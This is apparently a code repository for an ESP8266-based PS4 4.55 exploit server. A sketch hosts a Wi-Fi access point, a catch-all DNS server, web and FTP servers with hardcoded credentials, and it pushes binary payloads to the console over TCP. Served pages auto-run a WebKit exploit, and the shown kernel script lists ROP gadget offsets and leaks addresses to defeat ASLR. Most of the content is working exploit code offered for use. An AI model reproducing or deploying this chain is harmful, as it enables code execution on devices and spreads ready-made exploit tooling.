├── PS4Exploit
    ├── PS4Exploit.ino
    └── data
    │   ├── EnableBrowser-455.bin
    │   ├── XVortex-Dumper-455.bin
    │   ├── dumperindex.html
    │   ├── dumperpayload.js
    │   ├── favicon.ico
    │   ├── ftpindex.html
    │   ├── ftpkernel.js
    │   ├── ftploader.js
    │   ├── ftppayload.js
    │   ├── ftprop.js
    │   ├── ftpsyscalls.js
    │   ├── ftpuserland.js
    │   ├── henindex.html
    │   ├── henpayload.js
    │   ├── index.html
    │   ├── kernel.js
    │   ├── loader.js
    │   ├── payloadbin.html
    │   ├── ps4icon.png
    │   ├── rop.js
    │   ├── syscalls.js
    │   └── userland.js
└── README.md


/PS4Exploit/PS4Exploit.ino:
--------------------------------------------------------------------------------
  1 | #include <ESP8266FtpServer.h>
  2 | 
  3 | 
  4 | #include <ESP8266WiFi.h>
  5 | #include <WiFiClient.h>
  6 | #include <ESP8266WebServer.h>
  7 | 
  8 | #include <ESP8266mDNS.h>
  9 | #include <DNSServer.h>
 10 | 
 11 | #include <FS.h>
 12 | 
 13 | //#define NO_CONFIG 1
 14 | bool noConfig = false;
 15 | #define DBG_OUTPUT_PORT Serial
 16 | 
 17 | //DNS settings
 18 | const byte DNS_PORT = 53;
 19 | DNSServer dnsServer;
 20 | 
 21 | //payload settings
 22 | char jsCounter = 0;
 23 | char JS_MAX = 7;
 24 | WiFiClient ps4;
 25 | String ps4IP;
 26 | int ps4Port = 9020;
 27 | #define PACKET_SIZE 4096
 28 | char plPacket[ PACKET_SIZE ];
 29 | #define PAYLOAD_WAIT 0
 30 | 
 31 | ESP8266WebServer server( 80 );
 32 | String host = "ps4exploit";
 33 | 
 34 | //AP settings
 35 | bool revertToAP = false;
 36 | IPAddress local_IP( 10, 13, 37, 1 );
 37 | IPAddress gateway( 10, 13, 37, 9 );
 38 | IPAddress subnet( 255, 255, 255, 0 );
 39 | 
 40 | //default settings
 41 | String wifiMode = "ap";
 42 | String apName = "ps4exploit";
 43 | String apKey = "hackmyps4";
 44 | String stName = "yourrouter";
 45 | String stKey = "routerpassword";
 46 | String stAddress = "235";
 47 | String payload = "/EnableBrowser-455.bin";
 48 | 
 49 | #define resetPin D5
 50 | 
 51 | void uploadPayload() {
 52 | 
 53 |   DBG_OUTPUT_PORT.println( ps4IP );
 54 |   int tCounter = 0;
 55 | 
 56 |   while ( !ps4.connect( ps4IP.c_str(), ps4Port ) ) {
 57 | 
 58 |     tCounter++;
 59 | 
 60 |     if ( tCounter > 5000 ) {
 61 | 
 62 |       DBG_OUTPUT_PORT.println( "Couldn't connect" );
 63 |       jsCounter = 0;
 64 |       ps4.stop();
 65 |       return;
 66 | 
 67 |     }
 68 | 
 69 |   }
 70 | 
 71 |   File file = SPIFFS.open( payload, "r" );
 72 | 
 73 |   if ( !file ) {
 74 | 
 75 |     DBG_OUTPUT_PORT.printf( "%s couldn't be opened!\n", payload.c_str() );
 76 |     ps4.stop();
 77 |     return;
 78 | 
 79 |   }
 80 |   int filelen = file.size();
 81 |   DBG_OUTPUT_PORT.printf( "Sending payload %s to %s port %d\r\n", file.name(), ps4IP.c_str(), ps4Port );
 82 | 
 83 |   //while ( ps4.available() ) { ps4.read(); }
 84 | 
 85 |   int totalSent = 0;
 86 | 
 87 |   while ( file.available() > 0 ) {
 88 |     int i = file.readBytes(plPacket, PACKET_SIZE );
 89 |     totalSent += ps4.write( ( const uint8_t* )plPacket, i );
 90 |     DBG_OUTPUT_PORT.printf( "%d\%%\n", ( int )( ( totalSent * 100 ) / filelen ) );
 91 |     ps4.flush();
 92 |     
 93 |    
 94 | 
 95 |   }
 96 | 
 97 |   file.close();
 98 |   DBG_OUTPUT_PORT.println( "Payload sent" );
 99 |   ps4.stop();
100 |   jsCounter = 0;
101 | 
102 | 
103 | }
104 | 
105 | void loadConfig() {
106 | 
107 |   File file = SPIFFS.open( "/settings.ini", "r" );
108 | 
109 |   if ( !file ) {
110 | 
111 |     DBG_OUTPUT_PORT.println( "settings.ini couldn't be opened!" );
112 |     return;
113 | 
114 |   }
115 | 
116 |   String thisLine;
117 | 
118 |   while ( 1 ) {
119 | 
120 |     thisLine = file.readStringUntil( '\r' );
121 |     thisLine.trim();
122 |     if ( thisLine.indexOf( "wifimode=" ) == 0 ) wifiMode = thisLine.substring( 9 );
123 |     if ( thisLine.indexOf( "apname=" ) == 0 ) apName = thisLine.substring( 7 );
124 |     if ( thisLine.indexOf( "apkey=" ) == 0 ) apKey = thisLine.substring( 6 );
125 |     if ( thisLine.indexOf( "stname=" ) == 0 ) stName = thisLine.substring( 7 );
126 |     if ( thisLine.indexOf( "stkey=" ) == 0 ) stKey = thisLine.substring( 6 );
127 |     if ( thisLine.indexOf( "staddress=" ) == 0 ) stAddress = thisLine.substring( 10 );
128 |     if ( thisLine.indexOf( "payload=" ) == 0 ) payload = thisLine.substring( 8 );
129 |     if ( ( thisLine.length() == 0 ) || !thisLine.indexOf( "=" ) ) break;
130 | 
131 |   }
132 | 
133 |   file.close();
134 |   DBG_OUTPUT_PORT.println( "settings.ini loaded" );
135 | 
136 | }
137 | 
138 | void saveConfig() {
139 | 
140 |   File file = SPIFFS.open( "/settings.ini", "w" );
141 | 
142 |   for (int i = 0; i < server.args(); i++ ) {
143 | 
144 |     String settingsLine = server.argName( i ) + "=" + server.arg( i );
145 |     file.println( settingsLine.c_str() );
146 | 
147 |   }
148 | 
149 |   file.close();
150 |   file = SPIFFS.open( "/settings.ini", "r" );
151 |   char tempChar[ 400 ];
152 |   file.readBytes( tempChar, 400 );
153 |   DBG_OUTPUT_PORT.println( tempChar );
154 |   file.close();
155 |   loadConfig();
156 | 
157 | }
158 | 
159 | 
160 | String getContentType( String filename ) {
161 | 
162 |   if ( server.hasArg( "download" ) ) return "application/octet-stream";
163 |   else if ( filename.endsWith( ".htm") ) return "text/html";
164 |   else if ( filename.endsWith( ".html" ) ) return "text/html";
165 |   else if ( filename.endsWith( ".css" ) ) return "text/css";
166 |   else if ( filename.endsWith( ".js" ) ) return "application/javascript";
167 |   else if ( filename.endsWith( ".png" ) ) return "image/png";
168 |   else if ( filename.endsWith( ".gif" ) ) return "image/gif";
169 |   else if ( filename.endsWith( ".jpg" ) ) return "image/jpeg";
170 |   else if ( filename.endsWith( ".ico" ) ) return "image/x-icon";
171 |   else if ( filename.endsWith( ".gz" ) ) return "application/x-gzip";
172 |   return "text/plain";
173 | 
174 | }
175 | 
176 | bool handleFileRead( String path ) {
177 | 
178 |   path = path.substring( path.lastIndexOf( "/" ) );
179 |   ps4IP = server.client().remoteIP().toString();
180 | 
181 |   if ( path.endsWith( ".html" ) || path.endsWith( ".htm" ) ) {
182 | 
183 |     jsCounter = 0;
184 |     JS_MAX = 100;
185 | 
186 |   }
187 | 
188 |   if ( path.endsWith( ".js" ) ) jsCounter ++;
189 |   DBG_OUTPUT_PORT.println( "handleFileRead: " + path );
190 |   if ( path.endsWith( "/" ) ) path = "/index.html";
191 |   if ( path.length()  < 3 ) path = "/index.html";
192 |  
193 |   //set up trigger for payload transfer
194 |  
195 |   if ( path.endsWith( "payloadbin.html" ) ) JS_MAX = 5;
196 |   if ( path.endsWith( "henpayload.html" ) ) JS_MAX = 6;
197 |   if ( path.endsWith( "ftppayload.html" ) ) JS_MAX = 6;
198 |   if ( path.endsWith( "dumperpayload.html" ) ) JS_MAX = 6;
199 |   String contentType = getContentType( path );
200 |   String pathWithGz = path + ".gz";
201 | 
202 |   if ( SPIFFS.exists( pathWithGz ) || SPIFFS.exists( path ) ) {
203 | 
204 |    
205 |     if ( SPIFFS.exists( pathWithGz ) ) path += ".gz";
206 |     File file = SPIFFS.open( path, "r" );
207 |     size_t sent = server.streamFile( file, contentType );
208 |     file.close();
209 |    
210 |     return true;
211 | 
212 |   }
213 | 
214 |   return false;
215 | 
216 | }
217 |   String userIdentity = "ESPS4";
218 |   String userPassword = "password";
219 | 
220 | FtpServer ftpSrv; 
221 | 
222 | void setup( void ) {
223 | 
224 |   pinMode( resetPin, INPUT_PULLUP );
225 |   pinMode( LED_BUILTIN, OUTPUT );
226 |   digitalWrite( LED_BUILTIN, HIGH );
227 | 
228 |   WiFi.forceSleepBegin();
229 |   DBG_OUTPUT_PORT.begin( 115200 );
230 |   DBG_OUTPUT_PORT.print( "\n" );
231 |  
232 |   SPIFFS.begin();
233 |   ftpSrv.begin("ESPS4","password");
234 |   
235 | 
236 |   Dir dir = SPIFFS.openDir( "/" );
237 | 
238 |   if ( digitalRead( resetPin ) == LOW ) {
239 | 
240 |     DBG_OUTPUT_PORT.println( "Config loading bypassed!" );
241 |     noConfig = true;
242 |     wifiMode = "ap";
243 | 
244 |   }
245 | 
246 | #ifndef NO_CONFIG
247 | 
248 |   if ( noConfig == false ) loadConfig();
249 | 
250 | #endif
251 | 
252 |   if ( wifiMode == "ap" ) {
253 | 
254 |     WiFi.mode( WIFI_AP );
255 | 
256 |     if ( WiFi.softAPConfig( local_IP, gateway, subnet ) == false ) {
257 | 
258 |       DBG_OUTPUT_PORT.println( "Couldn't create AP" );
259 | 
260 |     }
261 |     else {
262 | 
263 |       DBG_OUTPUT_PORT.printf( "Creating AP " );
264 |       DBG_OUTPUT_PORT.println( apName );
265 | 
266 |     }
267 | 
268 |     while ( WiFi.softAP( apName.c_str(), apKey.c_str() ) == false ) {
269 | 
270 |       delay( 500 );
271 |       DBG_OUTPUT_PORT.print( "." );
272 | 
273 |     }
274 | 
275 |     if ( WiFi.softAPIP() == IPAddress( 0, 0, 0, 0 ) ) revertToAP = true;
276 |     else {
277 | 
278 |       DBG_OUTPUT_PORT.println( "" );
279 |       DBG_OUTPUT_PORT.print( "Connected! IP address: " );
280 |       DBG_OUTPUT_PORT.println( WiFi.softAPIP() );
281 | 
282 |     }
283 | 
284 |   }
285 |   else {
286 | 
287 |     DBG_OUTPUT_PORT.printf( "Connecting to %s\n", stName.c_str() );
288 |     WiFi.mode( WIFI_STA );
289 |     WiFi.begin( stName.c_str(), stKey.c_str() );
290 | 
291 |     int reconCounter = 0;
292 | 
293 |     while ( WiFi.status() != WL_CONNECTED ) {
294 | 
295 |       delay( 500 );
296 |       DBG_OUTPUT_PORT.print( "." );
297 | 
298 |       reconCounter++;
299 | 
300 |       if ( reconCounter == 20 ) {
301 | 
302 |         revertToAP = true;
303 |         break;
304 | 
305 |       }
306 | 
307 |     }
308 | 
309 |     IPAddress tempIP = WiFi.localIP();
310 |     IPAddress goodIP = WiFi.localIP();
311 |     IPAddress tempSubnet = WiFi.subnetMask();
312 |     char changed = 0;
313 | 
314 |     for (int i = 0; i < 4; i++ ) {
315 | 
316 |       if (  tempSubnet[ i ] == 0 ) {
317 | 
318 |         tempIP[ i ] = stAddress.toInt();
319 |         changed++;
320 | 
321 |       }
322 | 
323 |     }
324 | 
325 |     if (changed == 1 ) {
326 | 
327 |       WiFi.config( tempIP , WiFi.gatewayIP(), WiFi.subnetMask(), WiFi.dnsIP() );
328 |       reconCounter = 0;
329 | 
330 |       while ( WiFi.status() != WL_CONNECTED ) {
331 | 
332 |         delay( 500 );
333 |         DBG_OUTPUT_PORT.print( "." );
334 | 
335 |         reconCounter++;
336 | 
337 |         WiFi.config( goodIP , WiFi.gatewayIP(), WiFi.subnetMask(), WiFi.dnsIP() ); //revert back in case of collision, etc.
338 | 
339 |         if ( reconCounter == 20 ) {
340 | 
341 |           revertToAP = true;
342 |           break;
343 | 
344 |         }
345 | 
346 |       }
347 | 
348 |     }
349 | 
350 |     if ( WiFi.localIP() == IPAddress( 0, 0, 0, 0 ) ) revertToAP = true;
351 |     else {
352 | 
353 |       DBG_OUTPUT_PORT.println( "" );
354 |       DBG_OUTPUT_PORT.print( "Connected! IP address: " );
355 |       DBG_OUTPUT_PORT.println( WiFi.localIP() );
356 | 
357 |     }
358 | 
359 |   }
360 | 
361 |   if ( revertToAP == true ) {
362 | 
363 |     DBG_OUTPUT_PORT.println( "Reverting to default AP" );
364 |     wifiMode = "ap";
365 |     WiFi.mode( WIFI_AP );
366 |     WiFi.softAPConfig( local_IP, gateway, subnet );
367 | 
368 |   }
369 | 
370 |   if ( noConfig == true ) loadConfig();
371 |   MDNS.begin( host.c_str()  );
372 | 
373 |   if ( wifiMode == "ap" ) dnsServer.start( DNS_PORT, "*", WiFi.softAPIP() );
374 |   else dnsServer.start( DNS_PORT, "*", WiFi.localIP() );
375 | 
376 |   server.onNotFound( []() {
377 | 
378 |     if ( !handleFileRead( server.uri() ) ) {
379 | 
380 |       DBG_OUTPUT_PORT.printf( "URI not found " );
381 |       digitalWrite( LED_BUILTIN, LOW );
382 |       delay (500);
383 |       digitalWrite( LED_BUILTIN, HIGH );
384 | 
385 | 
386 |     }
387 |   
388 | 
389 |   } );
390 | 
391 |   server.on( "/", HTTP_GET, [] () {
392 | 
393 |     handleFileRead( "/index.html" );
394 | 
395 |   } );
396 | 
397 |   server.on( "/settings", HTTP_GET, [] () {
398 | 
399 |     String sPage;
400 | 
401 |     if ( server.args() > 0 ) {
402 | 
403 |       saveConfig();
404 |       sPage = "<HTML><HEAD><meta http-equiv=\"refresh\" content=\"1; url=/index.html\"/></HEAD><TITLE>PS4 Exploit Settings</TITLE><BODY>Settings saved. Reset the card if network settings were changed!</BODY></HTML>";
405 |       server.send( 200, "text/html", sPage );
406 |       return;
407 | 
408 |     }
409 | 
410 |     loadConfig();
411 | 
412 |     sPage = "<HTML><HEAD><LINK REL=\"icon\" TYPE=\"image/png\" HREF=\"/ps4icon.png\"/><TITLE>PS4 Exploit Settings</TITLE></HEAD>\n<BODY>\n";
413 |     sPage += "<FORM ID=\"form1\">\n<P>Wifi Mode</P>\n<DIV STYLE=\"margin-left: 1em;\">\n<INPUT TYPE =\"radio\" ID=\"ap\" NAME=\"wifimode\" VALUE=\"ap\"";
414 |     if ( wifiMode == "ap" ) sPage +=  " checked";
415 |     sPage += ">\n<LABEL FOR=\"ap\">Access Point</LABEL>\n<BR></BR>\n";
416 |     sPage += "<DIV STYLE=\"margin-left: 2em;\">\nName: <INPUT ID=\"apname\" TYPE=\"text\" NAME=\"apname\" VALUE=\"" + apName + "\" onkeyup=\"apnameverify()\">\n<LABEL ID=\"apnamelabel\"></LABEL>\n<BR></BR>\n";
417 |     sPage += "Password: <INPUT TYPE=\"password\" ID=\"apkey\" NAME=\"apkey\" VALUE=\"" + apKey + "\" onkeyup=\"apkeyverify()\">\n<LABEL ID=\"apkeylabel\"></LABEL>\n<BR></BR>\n</DIV>\n";
418 |     sPage += "<INPUT TYPE =\"radio\" ID=\"sta\" NAME=\"wifimode\" VALUE=\"sta\"";
419 |     if ( wifiMode == "sta" ) sPage += " checked";
420 |     sPage += ">\n<LABEL FOR=\"sta\">Station</LABEL>\n<BR></BR>\n</DIV>\n<DIV STYLE=\"margin-left: 2em;\">\n";
421 |     int n = WiFi.scanNetworks();
422 | 
423 |     if ( n == 0 ) sPage += "No networks found.\n<BR></BR>";
424 |     else {
425 | 
426 |       for (int i = 0; i < n; ++i) {
427 | 
428 |         sPage += "<INPUT TYPE =\"radio\" ID=\"station" + String(i) + "\" NAME=\"stname\" VALUE=\"" + WiFi.SSID(i) + "\" ";
429 |         if ( WiFi.SSID(i) == stName ) sPage += "checked";
430 |         sPage += ">\n<LABEL FOR=\"station" + String(i, DEC) + "\">" + WiFi.SSID(i);
431 |         if ( WiFi.encryptionType(i) == ENC_TYPE_NONE ) sPage += " (open)";
432 |         sPage += "</LABEL>\n<BR></BR>\n";
433 | 
434 |       }
435 | 
436 |       sPage += "<DIV STYLE=\"margin-left: 2em;\">\nPassword: <INPUT TYPE=\"password\" NAME=\"stkey\" VALUE=\"" + stKey + "\">\n<BR></BR>\n";
437 |       sPage += "Static IP: <INPUT TYPE=\"text\" ID=\"staddress\" NAME=\"staddress\" VALUE=\"" + stAddress + "\" onkeypress=\"return isNumber(event)\" onkeyup=\"staddressverify()\">\n<LABEL ID=\"staddresslabel\"></LABEL>\n<BR></BR>\n</DIV>\n";
438 |     }
439 | 
440 |     sPage += "</DIV>\n<P>Payload</P>\n<DIV STYLE=\"margin-left: 1em;\">";
441 | 
442 |     Dir dir = SPIFFS.openDir( "/" );
443 |     char firstFound = 0;
444 | 
445 |     while ( dir.next() ) {
446 | 
447 |       String fileName = dir.fileName();
448 | 
449 |       if ( fileName.endsWith( ".bin" ) ) {
450 | 
451 |         //String temp = fileName.substring( 1 );
452 |         sPage += "\n<INPUT TYPE=\"radio\" ID=\"payload" + String(firstFound) + "\" NAME=\"payload\" VALUE=\"" + fileName + "\" " ;
453 |         if ( fileName == payload ) sPage += "checked";
454 |         firstFound ++;
455 |         sPage += ">\n<LABEL FOR=\"payload" + String(firstFound, DEC) + "\">" + fileName.substring( 1 ) + "</LABEL>\n<BR></BR>";
456 | 
457 |       }
458 | 
459 |     }
460 | 
461 |     if ( firstFound == 0 ) {
462 | 
463 |       sPage += "\nNo payloads found!\n<BR></BR>";
464 |       payload = "";
465 | 
466 |     }
467 | 
468 |     sPage += "\n</DIV>\n<DIV>\n</FORM>\n<BUTTON TYPE=\"submit\" ID=\"submitbtn\" FORM=\"form1\" VALUE=\"Submit\">Save</BUTTON>\n\n";
469 |     sPage += "<SCRIPT>\n\nfunction apnameverify() {\nendissubmit();\nif ( apname.value.length < 1 ) {\ndocument.getElementById('apnamelabel').innerHTML = \"Fill in an AP name\";\n}\nelse { document.getElementById('apnamelabel').innerHTML = \"\";\n}\n}\n";
470 |     sPage += "\nfunction apkeyverify() {\nendissubmit();\nif ( apkey.value.length < 8 ) {\ndocument.getElementById('apkeylabel').innerHTML = \"Password must be at least 8 characters in length\";\n}\nelse { document.getElementById('apkeylabel').innerHTML = \"\";\n}\n}\n";
471 |     sPage += "\nfunction endissubmit() {\nif ( ( apname.value.length < 1 ) || ( apkey.value.length < 8 ) ) {\nsubmitbtn.disabled = true;\n}\nelse {\nsubmitbtn.disabled = false;\n}\n}\n";
472 |     sPage += "\nfunction isNumber( evt ) {\nnevt = ( evt ) ? evt : window.event;\nvar charCode = ( evt.which ) ? evt.which : evt.keyCode;\nif ( charCode > 31 && ( charCode < 48 || charCode > 57 ) ) {\nreturn false;\n}\nreturn true;\n}\n";
473 |     sPage += "\nfunction staddressverify() {\nvar x= parseInt( staddress.value );\nif ( staddress.value == \"\" || ( ( x < 2 ) || ( x > 255 ) ) ) {\ndocument.getElementById('staddresslabel').innerHTML = \"Must be in range of 2 to 255\";\n}\nelse {\ndocument.getElementById('staddresslabel').innerHTML = \"\";\n}\n}\n\n";
474 |     sPage += "</SCRIPT>\n</DIV>\n<BR></BR>\n</BODY>\n</HTML>";
475 | 
476 |     server.send( 200, "text/html", sPage );
477 | 
478 |   } );
479 | 
480 |   server.begin();
481 |   DBG_OUTPUT_PORT.println( "HTTP server started" );
482 | 
483 | }
484 | 
485 | void loop( void ) {
486 | 
487 |   ftpSrv.handleFTP();
488 | 
489 | 
490 |   dnsServer.processNextRequest();
491 |   server.handleClient();
492 |   // if ( DBG_OUTPUT_PORT.available() ) uploadPayload(); //force resend of payload on serial RX
493 | if ( jsCounter == JS_MAX ) {
494 |     
495 |     delay( 50 );
496 |     uploadPayload();
497 |     digitalWrite( LED_BUILTIN, LOW );
498 |     delay (500);
499 |     digitalWrite( LED_BUILTIN, HIGH );
500 |     
501 |   }
502 | 
503 | 
504 | 
505 | 
506 | }
507 | 
508 | 
509 | 
510 | 
511 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/EnableBrowser-455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5u770n/ESPS4ExploitServer/f8b3a77f6415f05628a1ac530c01a606a841cb11/PS4Exploit/data/EnableBrowser-455.bin


--------------------------------------------------------------------------------
/PS4Exploit/data/XVortex-Dumper-455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5u770n/ESPS4ExploitServer/f8b3a77f6415f05628a1ac530c01a606a841cb11/PS4Exploit/data/XVortex-Dumper-455.bin


--------------------------------------------------------------------------------
/PS4Exploit/data/dumperindex.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 4.55 (DUMPER)</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | 
 57 | <body onload="runExploit()" style="margin:0;">
 58 |   <div id="loader" class="loader"></div>
 59 | 
 60 |   <div id="allset" class="info" style="display:none;">
 61 |     You're all set!
 62 |   </div>
 63 | 
 64 |   <div id="fail" class="info" style="display:none;">
 65 |     Something went wrong :(
 66 |   </div>
 67 | 
 68 |   <div id="badfw" class="info" style="display:none;">
 69 |     Only firmware 4.55 is supported!
 70 |   </div>
 71 | 
 72 |   <div id="footer" class="credits">
 73 |     <ul style="list-style: none;padding-left:0">
 74 |       <li><a href="#">qwertyoruiopz</a></li>
 75 |       <li><a href="#">flatz</a></li>
 76 |       <li><a href="#">specter</a></li>
 77 |       <li><a href="#">xvortex</a></li>
 78 |       <li>anonymous contributors</li>
 79 |     </ul>
 80 |   </div>
 81 | 
 82 |   <script>
 83 |     function runExploit() {
 84 |       setTimeout(exploit, 1500);
 85 |     }
 86 | 
 87 |     function allset() {
 88 |       document.getElementById("loader").style.display = "none";
 89 |       document.getElementById("allset").style.display = "block";
 90 |     }
 91 | 
 92 |     function fail(info) {
 93 |       document.getElementById("loader").style.display = "none";
 94 |       document.getElementById("fail").style.display = "block";
 95 | 
 96 |       alert(info)
 97 |     }
 98 |   </script>
 99 | 
100 |   <script src="ftprop.js"></script>
101 |   <script src="ftpsyscalls.js"></script>
102 |   <script src="ftploader.js"></script>
103 |   <script src="dumperpayload.js"></script>
104 |   <script src="ftpuserland.js"></script>
105 |   <script src="ftpkernel.js"></script>
106 | </body>
107 | </html>
108 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5u770n/ESPS4ExploitServer/f8b3a77f6415f05628a1ac530c01a606a841cb11/PS4Exploit/data/favicon.ico


--------------------------------------------------------------------------------
/PS4Exploit/data/ftpindex.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 4.55 (FTP)</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | 
 57 | <body onload="runExploit()" style="margin:0;">
 58 |   <div id="loader" class="loader"></div>
 59 | 
 60 |   <div id="allset" class="info" style="display:none;">
 61 |     You're all set!
 62 |   </div>
 63 | 
 64 |   <div id="fail" class="info" style="display:none;">
 65 |     Something went wrong :(
 66 |   </div>
 67 | 
 68 |   <div id="badfw" class="info" style="display:none;">
 69 |     Only firmware 4.55 is supported!
 70 |   </div>
 71 | 
 72 |   <div id="footer" class="credits">
 73 |     <ul style="list-style: none;padding-left:0">
 74 |       <li><a href="#">qwertyoruiopz</a></li>
 75 |       <li><a href="#">flatz</a></li>
 76 |       <li><a href="#">specter</a></li>
 77 |       <li><a href="#">xvortex</a></li>
 78 |       <li>anonymous contributors</li>
 79 |     </ul>
 80 |   </div>
 81 | 
 82 |   <script>
 83 |     function runExploit() {
 84 |       setTimeout(exploit, 1500);
 85 |     }
 86 | 
 87 |     function allset() {
 88 |       document.getElementById("loader").style.display = "none";
 89 |       document.getElementById("allset").style.display = "block";
 90 |     }
 91 | 
 92 |     function fail(info) {
 93 |       document.getElementById("loader").style.display = "none";
 94 |       document.getElementById("fail").style.display = "block";
 95 | 
 96 |       alert(info)
 97 |     }
 98 |   </script>
 99 | 
100 |   <script src="ftprop.js"></script>
101 |   <script src="ftpsyscalls.js"></script>
102 |   <script src="ftploader.js"></script>
103 |   <script src="ftppayload.js"></script>
104 |   <script src="ftpuserland.js"></script>
105 |   <script src="ftpkernel.js"></script>
106 | </body>
107 | </html>
108 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ftpkernel.js:
--------------------------------------------------------------------------------
  1 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  2 | // CODE EXECUTION (STILL USERLAND) ///////////////////////////////////////////////////////////////////////////////////
  3 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  4 | var p;
  5 | 
  6 | var deref_stub_jmp = function(addr) {
  7 |   var z = p.read4(addr) & 0xFFFF;
  8 |   var y = p.read4(addr.add32(2));
  9 | 
 10 |   if (z != 0x25FF) return 0;
 11 |   
 12 |   return addr.add32(y + 6);
 13 | }
 14 | 
 15 | var gadgets;
 16 | 
 17 | /*
 18 | kchain.push(window.gadgets["pop rax"]);
 19 |       kchain.push(savectx.add32(0x30));
 20 |       kchain.push(window.gadgets["mov rax, [rax]"]);
 21 |       kchain.push(window.gadgets["pop rcx"]);
 22 |       kchain.push(kernel_slide);
 23 |       kchain.push(window.gadgets["add rax, rcx"]);
 24 |       kchain.push(window.gadgets["pop rdi"]);
 25 |       kchain.push(savectx.add32(0x50));
 26 |       kchain.push(window.gadgets["mov [rdi], rax"]);
 27 |       */
 28 | gadgets = {
 29 |   "ret":                    0x0000003C,
 30 |   "jmp rax":                0x00000082,
 31 |   "ep":                     0x000000AD,
 32 |   "pop rbp":                0x000000B6,
 33 |   "mov [rdi], rax":         0x00003FBA,
 34 |   "pop r8":                 0x0000CC42,
 35 |   "pop rax":                0x0000CC43,
 36 |   "mov rax, rdi":           0x0000E84E,
 37 |   "mov rax, [rax]":         0x000130A3,
 38 |   "mov rdi, rax; jmp rcx":  0x0003447A,
 39 |   "pop rsi":                0x0007B1EE,
 40 |   "pop rdi":                0x0007B23D,
 41 |   "add rsi, rcx; jmp rsi":  0x001FA5D4,
 42 |   "pop rcx":                0x00271DE3,
 43 |   "pop rsp":                0x0027A450,
 44 |   "mov [rdi], rsi":         0x0039CF70,
 45 |   "mov [rax], rsi":         0x003D0877,
 46 |   "add rsi, rax; jmp rsi":  0x004E040C,
 47 |   "pop rdx":                0x00565838,
 48 |   "pop r9":                 0x0078BA1F,
 49 |   "add rax, rcx":           0x0084D04D,
 50 |   "jop":                    0x01277350,
 51 |   "infloop":                0x012C4009,
 52 | 
 53 |   "stack_chk_fail":         0x000000C8,
 54 |   "memcpy":                 0x000000F8,
 55 |   "setjmp":                 0x00001468
 56 | };
 57 | 
 58 | var reenter_help = { length:
 59 |     { valueOf: function(){
 60 |         return 0;
 61 |     }
 62 | }};
 63 | 
 64 | var postExploit = function() {
 65 |   p=window.primitives;
 66 | 
 67 |   p.leakfunc = function(func)
 68 |   {
 69 |     var fptr_store = p.leakval(func);
 70 |     return (p.read8(fptr_store.add32(0x18))).add32(0x40);
 71 |   }
 72 | 
 73 |   try {
 74 |     // Leak address of parseFloat()
 75 |     var parseFloatStore = p.leakfunc(parseFloat);
 76 |     var parseFloatPtr = p.read8(parseFloatStore);
 77 | 
 78 |     // Defeat ASLR
 79 |     // Get webkit module address
 80 |     var webKitBase  = p.read8(parseFloatStore);
 81 |     webKitBase.low &= 0xffffc000;
 82 |     webKitBase.sub32inplace(0xe8c000);
 83 | 
 84 |     window.moduleBaseWebKit = webKitBase;
 85 | 
 86 |     var offsetToWebKit = function(off) {
 87 |       return window.moduleBaseWebKit.add32(off)
 88 |     }
 89 | 
 90 |     // Set gadgets to proper addresses
 91 |     for(var gadget in gadgets) {
 92 |       gadgets[gadget] = offsetToWebKit(gadgets[gadget]);
 93 |     }
